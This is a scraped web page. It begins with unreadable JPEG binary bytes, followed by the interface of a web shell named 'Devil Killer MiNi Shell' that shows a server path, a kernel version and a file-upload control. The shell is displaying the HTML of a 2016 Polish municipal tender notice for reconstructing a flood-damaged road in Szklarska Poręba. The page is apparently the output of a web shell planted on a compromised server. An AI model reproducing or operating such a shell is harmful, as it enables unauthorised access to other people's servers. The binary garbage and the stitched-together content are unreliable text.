JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20161001/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20161001/316409-N-2016.html

<div class="divRow_xforms"><div>
              Ogłoszenie nr 316409 - 2016
              z dnia 2016-10-01 r.
            </div><div class="headerMedium_xforms" style="text-align: center">Szklarska Poręba:  PRZEBUDOWA ODCINKA ULICY WIEJSKIEJ
DZ. NR 50, 72, 76/2, 77, 85  OBRĘB 0003
W SZKLARSKIEJ PORĘBIE - USZKODZONEJ W TRAKCIE POWODZI  2014 r
<br />
            OGŁOSZENIE O ZAMÓWIENIU -
            
              Roboty budowlane
            </div><div><b>Zamieszczanie ogłoszenia:</b>
              obowiązkowe
            </div><div><b>Ogłoszenie dotyczy:</b>
              zamówienia publicznego
            </div><div><b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><br /><b>Nazwa projektu lub programu</b><br /></div><div><b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje  społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %)
            <br /></div><div class="headerLarge_xforms" style="text-align: left"><u>SEKCJA I: ZAMAWIAJĄCY</u></div><div style="padding-left: 20px"><b>Postępowanie przeprowadza centralny zamawiający </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b><br /><b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów:
            <br /><br /><b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej  mające zastosowanie krajowe prawo zamówień publicznych:</b><br /><b>Informacje dodatkowe:</b><br /></div><div style="padding-left: 20px;"><div style="text-align: left"><b>I. 1) NAZWA I ADRES: </b>Miasto Szklarska Poręba, krajowy numer identyfikacyjny
              23082164100000, ul.
              ul. M. Buczka 
              2,
              58580  
              Szklarska Poręba, woj.
              dolnośląskie, państwo
              , tel.
              757 547 700, e-mail
              sekretariat@szklarskaporeba.pl, faks
              757 547 724.
              <br />
              Adres strony internetowej (URL): www.szklarskaporeba.pl<br /><br /></div><div style="text-align: left"><b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b>
                Administracja samorządowa
              </div><div style="text-align: left"><b>
                I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>:
              </b><div style="padding-left: 20px">
                Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym
                w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających):
                <br /></div></div><div style="text-align: left"><b>
                I.4) KOMUNIKACJA:
              </b><br /><b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b><div style="padding-left: 20px">
                  nie
                <br /></div><br /><b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b><div style="padding-left: 20px">
                  tak
                <br />www.szklarskaporeba.bip.net.pl</div><br /><b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b><div style="padding-left: 20px">
                  nie
                <br /></div><br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b><br /><b>Elektronicznie</b><div style="padding-left: 20px">
                  nie
                <br />
                adres
                <br /></div><br /><div style="padding-left: 20px"><b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  nie
                <br /><b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  tak
                  <br />
                  Inny sposób:
                  <br />w formie pisemnej<br />
                Adres:
                <br />Urząd Miejski w Szklarskiej Porębie, ul. M.Buczka 2, 58-580 Szklarska Poręba, lub bezpośrednio w Biurze Obsługi Interesantów - parter, adres jw. </div><br /><b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b><div style="padding-left: 20px">
                  nie
                <br />
                Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL)
                <br /></div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA II: PRZEDMIOT ZAMÓWIENIA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><br /><b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b> PRZEBUDOWA ODCINKA ULICY WIEJSKIEJ
DZ. NR 50, 72, 76/2, 77, 85  OBRĘB 0003
W SZKLARSKIEJ PORĘBIE - USZKODZONEJ W TRAKCIE POWODZI  2014 r
<br /><b>Numer referencyjny: </b><br /><b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b><br /><div style="padding-left: 20px; text-align: justify">
                  nie
                </div><br /><b>II.2) Rodzaj zamówienia: </b>
                roboty budowlane
              <br /><b>II.3) Informacja o możliwości składania ofert częściowych</b><br />
              Zamówienie podzielone jest na części:
              <br /><div style="padding-left: 20px">
                  Nie
                </div><br /><br /><b>
                II.4) Krótki opis przedmiotu zamówienia
              </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:
              </b>1.  Przedmiotem zamówienia jest przebudowa odcinka ulicy Wiejskiej w Szklarskiej Porębie, uszkodzonej w trakcie powodzi  w 2014 r., w której zakres wchodzi:
ścinka zawyżonych poboczy,wzmocnienie istniejącej nawierzchni tłuczniowej ulicy poprzez ułożenie płyt prefabrykowanych typu JOMB na podbudowie z chudego betonu,przebudowa przepustu drogowego pod jezdnią główną, uzupełnienie poboczy niesortem kamiennym.
Istniejąca ulica Wiejska na projektowanym odcinku zlokalizowana jest na działkach ewidencji gruntu 50, 72, 76/2, 77, 85 obręb 0003 w Szklarskiej Porębie. Cały odcinek jest jedno jezdniowy o następujących parametrach technicznych: klasa drogi D, prędkość projektowa 30km/h,  kategoria ruchu KR-1, nawierzchnia jezdni o konstr. tłuczniowej, szerokość jezdni  3,00m, odwodnienie powierzchniowe.Na terenie objętym opracowaniem występują sieci uzbrojenia: elektryczne, telefoniczne, gazowe, wodno-kanaliz. których  nie przewiduje się do przebudowy. 
Parametry techniczne i geometryczne projektowanego odcinka przyjęto zachowując istniejącą klasę drogi i kategorię ruchu: klasa drogi D,prędkość projektowa 30km/hkategoria ruchu  KR-1,nawierzchnia jezdni z żelbetowych płyt prefabrykowanych typu JOMB,
przekrój drogowy,szerokość jezdni  3,00mm,odwodnienie powierzchniowe.
W ramach robót przygotowawczych i rozbiórkowych  przewiduję się wykonać: pomiar geodezyjny  - długość projektowanego odcinka  ok.1132,00 mb; rozbiórkę istniejącego krawężnika betonowego po stronie prawej na odcinku od km 0+045,00 do km 0+086,00 - ok. 41,00mb;
rozbiórkę istniejącego przepustu pod jezdnią główną wraz ze ściankami czołowymi w km 0+140,50    ok.6,00mb; ścinkę zawyżonych poboczy    ok.1099,00 m2.
W ramach obramowania jezdni przewiduję się wykonać odtworzenie krawężnika betonowego na odcinku od km 0+045,00 do km 0+086,00      ok.41,00 mb.
Odwodnienie projektowanej jezdni przewidziano za pomocą spadków poprzecznych i podłużnych na przyległy teren oraz do istniejących rowów.
W ramach przebudowy ulicy przewiduję się wykonanie przebudowy przepustu w km 0+140,50 o następującym zakresie robót:wykonanie ławy betonowej z betonu -pod przepustem   ok.1,50 m3;ułożenie części przelotowej przepustu z żelbetowych elementów skrzynkowych   ok.6,00 mb; wykonanie płyty żelbetowej- nad przepustem  ok.0,80 m3; wykonanie ścianek czołowych z betonu B30       ok.5,20m3; wykonanie ław betonowych pod ścianki czołowe  ok.5,00 m

W ramach robót nawierzchniowych należy wykonać:
- wzmocnienie i wyrównanie istniejącej nawierzchni tłuczniowej poprzez wykonanie podbudowy z chudego   betonu  ok.1016,00 m2; wzmocnienie i wyrównanie istniejącej nawierzchni tłuczniowej poprzez ułożenie warstwy podbudowy                               z kruszywa łamanego  ok.2337,00 m2;ułożenie nawierzchni z podwójnie zbrojonych płyt żelbetowych prefabrykowanych wielootworowych typu JOMB ok.3150,00 m2;warstwę wyrównawczą z masy mineralno-asfaltowej na długości istniejącego odcinka drogi o nawierzchni bitumicznej od km 0+000,00 do km 0+020,00 i od km 1+036,00 do km 1+132,00     ok.37,50 Mg;warstwę ścieralną z betonu asfaltowego na długości istniejącego odcinka drogi o nawierzchni bitumicznej od km 0+000,00 do km 0+020,00 i od km 1+036,00 do km 1+132,00   ok. 375,00 m2;
W ramach robót wykończeniowych przewiduje się wykonać:uzupełnienie poboczy niesortem kamiennym  - ok. 1099,00 m2; wykonanie nasypów z gruntu niewysadzinowego w celu uzupełnienia terenu w obrębie projektowanego krawężnika  ok. 12,00 m.

Powyższy zakres ma charakter poglądowy. Szczegółowy opis przedmiotu zamówienia  zawarty jest w Rozdziale III.  Specyfikacji Istotnych Warunków Zamówienia  pn.  Opis przedmiotu zamówienia,  ogólnie zwanym Dokumentacją projektową oraz w opisie zakresu orientacyjnego przedmiaru robót.
Zamawiający dodatkowo  informuje, że wykonawca  jest zobowiązany w cenie ryczałtowej za wykonanie  przedmiotu zamówienia ująć wykonanie czasowej organizacji ruchu na czas trwania realizacji zamówienia.W oparciu o art. 29 ust.3a upzp Zamawiający żąda zatrudnienia przez wykonawcę lub podwykonawcę kierownika budowy na umowę o pracę, ponieważ ma wykonywać pracę polegającą na świadczeniu pracy oraz wszystkie osoby zatrudnione do wykonywania robót rozbiórkowych i wykończeniowych opisanych w ww. punkcie1 na umowę o pracę, których wykonywanie czynności polegać ma na wykonywaniu pracy w sposób określony w art.22 §1 ustawy   z 26.06.1974 r.- Kodeks Pracy Dz.U. z 2014 r. poz.1502, z późn.zm.Wymagany okres gwarancji jakości i rękojmi za wady  dla całego przedmiotu zamówienia  - minimum 60  miesięcy. Bieg okresu gwarancji rozpoczyna się wraz z dniem podpisania protokołu odbioru końcowego przedmiotu zamówienia, w którym nie stwierdza się  występowania wad lub wraz z dniem podpisania protokołu odbioru usunięcia wad i usterek stwierdzonych w protokole odbioru końcowego.
<br /><br /><b>II.5) Główny kod CPV: </b>45233123-7<br /><br /><b>
                II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>:
              
              <br />
              Wartość bez VAT:
              <br />
              Waluta:
              <br /><div style="padding-left: 20px"><br /><i>(w przypadku umów ramowych lub dynamicznego systemu zakupów  szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i></div><br /><b>
                II.7)
                Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7  lub w art. 134 ust. 6 pkt 3  ustawy Pzp:
              </b>
                nie
              <br /><b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b><div style="padding-left: 20px"><br /></div><br /><b>II.9) Informacje dodatkowe: </b></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>
                III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU
              </b><br /><div style="padding-left: 20px"><b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b><br />
                Określenie warunków:
                Działalność zawodowa  prowadzona na potrzeby wykonania przedmiotu zmówienia nie wymaga posiadania specjalnych kompetencji lub uprawnień<br />
                Informacje dodatkowe
                <br /><b>III.1.2)  Sytuacja finansowa lub ekonomiczna  </b><br />
                Określenie warunków:
                Wymagane jest wykazanie przez wykonawcę posiadanie odpowiedniego ubezpieczenia odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na sumę gwarancyjną minimum 400 000zł.  
         Wymagane jest dysponowanie środkami finansowymi lub posiadaną zdolnością kredytową (lub środkami finansowymi  i  zdolnością kredytową)  - w wysokości co najmniej  250 000  PLN
<br />
                Informacje dodatkowe
                Postanowienia dotyczące Podmiotów udostępniających zasoby:
a)  wykonawca może w celu potwierdzenia spełnienia warunków udziału w postępowaniu polegać sytuacji finansowej lub ekonomicznej innych podmiotów, zwanych Podmiotami udostępniającymi zasoby,  niezależnie od charakteru prawnego łączących go z nim stosunków prawnych.

b)  wykonawca, który polega na sytuacji finansowej lub ekonomicznej innych podmiotów, musi udowodnić Zamawiającemu, że realizując niniejsze zamówienia, będzie dysponował niezbędnymi zasobami tych podmiotów, w szczególności przedstawiając zobowiązanie tych Podmiotów do oddania mu do dyspozycji niezbędnych zasobów na potrzeby realizacji zamówienia
c)  Zamawiający oceni, czy sytuacja finansowa lub ekonomiczna Podmiotu udostępniającego, pozwala na wykazanie przez wykonawcę spełniania warunków udziału w postępowaniu oraz dokona badania, czy nie zachodzą wobec wykonawcy i Podmiotu udostepniającego podstawy wykluczenia, o których mowa w pkt. VIII.
d)	jeżeli sytuacja finansowa lub ekonomiczna, Podmiotu udostępniającego zasoby nie potwierdza spełnienia przez wykonawcę warunków udziału w postępowaniu lub zachodzą wobec niego podstawy wykluczenia, Zamawiający żądać będzie, aby wykonawca w określonym terminie zastąpił ten Podmiot innym Podmiotem
e)	
W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia, zobowiązani są oni wykazać spełnienie warunków udziału w postępowaniu łącznie. 

Jeżeli wykonawca korzysta z Podmiotu udostępniającego zasoby  celem wykazania spełnienia warunku  udziału w postępowaniu  Wykonawca jest zobowiązany dołączyć  w oryginale zobowiązanie tego Podmiotu udostępniającego- wg wzoru stanowiącego Załącznik nr 5


<br /><b>III.1.3) Zdolność techniczna lub zawodowa </b><br />
                Określenie warunków:
                Wymagane jest od wykonawcy dysponowanie Kierownikiem Budowy, który będzie  wykonywać pracę     polegającą na świadczeniu pracy,  i  który posiadać będzie:
                   - co najmniej 24miesięczne doświadczenie zawodowe na stanowisku kierownika budowy przy realizacji 
                     robót budowlanych w branży drogowej, w zakresie  budowy lub przebudowy dróg
                   - uprawnienia budowlane do kierowania robotami budowlanymi w specjalności drogowej        
                       lub odpowiadające im ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów .
 
Jeżeli wskazana wyżej osoba jest  obywatelem państw członkowskich Unii Europejskiej i nabyła w tych państwach, poza granicami Rzeczypospolitej Polskiej, kwalifikacje zawodowe do wykonywania samodzielnych funkcji w budownictwie, mając na względzie obowiązujące w Polsce przepisy prawa krajowego wymagane jest od tej osoby uznanie jej kwalifikacji zawodowych.

Jeżeli wykonawca korzysta z Podmiotu udostępniającego zasoby  celem wykazania spełnienia warunku  udziału w postępowaniu  Wykonawca jest zobowiązany dołączyć  w oryginale zobowiązanie tego Podmiotu udostępniającego- wg wzoru stanowiącego Załącznik nr 5<br />
                Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób:
                
                  tak
                <br />
                Informacje dodatkowe:
                </div><b>
                III.2) PODSTAWY WYKLUCZENIA
              </b><br /><div style="padding-left: 20px"><b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1  ustawy Pzp</b><br /><b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b>
                  nie
                <br /></div><b>
                III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI
              </b><br /><div style="padding-left: 20px"><b>
                  Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu
                </b><br />
                  tak
                <br /><b>
                  Oświadczenie o spełnianiu kryteriów selekcji
                </b><br />
                  nie
                </div><b>
                III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP:
              </b><br /><div style="padding-left: 20px">W terminie 3 dni od dnia przekazania, na stronie internetowej Zamawiającego, informacji z otwarcia ofert, o której mowa w art.86 ust.5 upzp., wykonawca przekazuje Zamawiającemu oświadczenie o przynależności lub braku przynależności do tej samej grupy kapitałowej - wg wzoru stanowiącego Załącznik  nr 6
 Wraz  z oświadczeniem, wykonawca może przedstawić  dowody, że powiązania z innym wykonawcą nie prowadzą     do zakłócenia konkurencji w postępowaniu o udzielenie zamówienia.
</div><b>
                III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP
              </b><br /><div style="padding-left: 20px"><b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b><br />Dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.
Jeżeli z uzasadnionej przyczyny wykonawca nie może złożyć ww. dokumentu, dopuszcza się złożenie innych dokumentów , który w wystarczający sposób potwierdzi spełnienie tego warunku.
Informację z banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającej wysokość  posiadanych środków finansowych lub zdolność kredytową wykonawcy , w okresie nie wcześniejszym niż 1 miesiąc przed upływem  terminu składania ofert.
Wykaz osób (wszystkich) skierowanych przez wykonawcę do realizacji zamówienia publicznego,            w szczególności odpowiedzialnych za kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie dysponowania osobami, wg wzoru stanowiącego Załącznik nr 4<br /><b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b><br /></div><b>
                III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP
              </b><br /><div style="padding-left: 20px">nie dotyczy</div><b>
                III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6)
              </b><div style="padding-left: 20px"></div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA IV: PROCEDURA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>IV.1) OPIS </b><br /><b>IV.1.1) Tryb udzielenia zamówienia: </b>
                przetarg nieograniczony
              <br /><b>IV.1.2) Zamawiający żąda wniesienia wadium:</b><div style="padding-left: 20px">
                  tak,
                  <br />
                  Informacja na temat wadium
                  <br />1.	 Każdy wykonawca zobowiązany jest zabezpieczyć składaną ofertę wadium w wysokości  10 000  PLN        
       (słownie złotych:  dziesięć tysięcy).

2.	 Wadium może być wniesione w następujących formach:
pieniądzu,
poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej z  tym, że       
  poręczenie kasy jest zawsze poręczeniem pieniężnym,gwarancjach bankowych, gwarancjach ubezpieczeniowych,poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z   09.11.2000 r.  o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości ( Dz. U. z 2014 r. poz.1804   z późn.zm.) 

3.	 Polisa, gwarancja, poręczenie  lub inny dokument stanowiący formę wadium winno  zawierać  stwierdzenie, że na pierwsze pisemne żądanie Zamawiającego wzywające do zapłaty kwoty wadium zgodnie z warunkami SIWZ,
Następuje jego bezwarunkowa wypłata bez jakichkolwiek zastrzeżeń ze strony gwaranta/poręczyciela.
Koniecznym jest, żeby dokument ten obejmował    odpowiedzialność za wszystkie przypadki powodujące utratę wadium przez Wykonawcę, określone w art. 46 ust.4a i 5 upzp.

4.	Wadium wnoszone w pieniądzu należy wpłacić - przelewem na rachunek Zamawiającego,  otwarty  w  PLN : Bank Zachodni WBK S.A. 1 Oddział  w Szklarskiej Porębie -  nr 68 1090 1984 0000 0001 0081 6338 , z adnotacją w tytule wpłaty :  Wadium  ul. Wiejska_ X 2016.

5.	Wadium wnoszone w innej, niż  pieniądz  dopuszczonej przez Zamawiającego formie _formach wykonawca wnosi do Zamawiającego  przy czym,  w takim przypadku za termin doręczenia oryginału dokumenty uważa się datę jego zdeponowania u  Kierownika Referatu Inwestycji Miejskich i Gospodarki Komunalnej -  budynek  Urzędu Miasta Szklarska Poręba - II piętro  lub  innej, wskazanej  osoby w ww. Referacie, w godzinach od 07:30 do 15:00 od poniedziałku do piątku, z wyłączeniem sobót i dni ustawowo wolnych od pracy.

6.  Wadium w innej, niż pieniądz dopuszczonej  przez Zamawiającego, formie/formach wykonawca może  również dołączyć do oferty.

7.   Wadium należy wnieść przed upływem terminu składania ofert, przy czym wniesienie wadium  w  pieniądzu  za pomocą  przelewu bankowego, Zamawiający będzie uważał za skuteczne wówczas, gdy Bank prowadzący rachunek Zamawiającego potwierdzi, że otrzymał taki przelew przed upływem terminu składania ofert. Dołączenie do oferty kopii polecenia przelewu wystawionego przez wykonawcę jest nie wystarczającym  warunkiem do stwierdzenia terminowego wniesienia wadium przez wykonawcę. 

8. W przypadku, kiedy wnoszone wadium  w postaci gwarancji bankowych bądź ubezpieczeniowych  dotyczy zabezpieczenia oferty składanej  przez wykonawców ubiegających się wspólnie o udzielenie zamówienia   w treści  gwarancji bankowych bądź ubezpieczeniowych  muszą znajdować się wszystkie podmioty (członkowie konsorcjum, wspólnicy spółki cywilnej, partnerzy spółki joint venture) wymienieni jako wykonawcy.

9.   Zamawiający zwróci niezwłocznie wadium według zasad określonych w art. 46  ust.1 do ust.4 upzp.


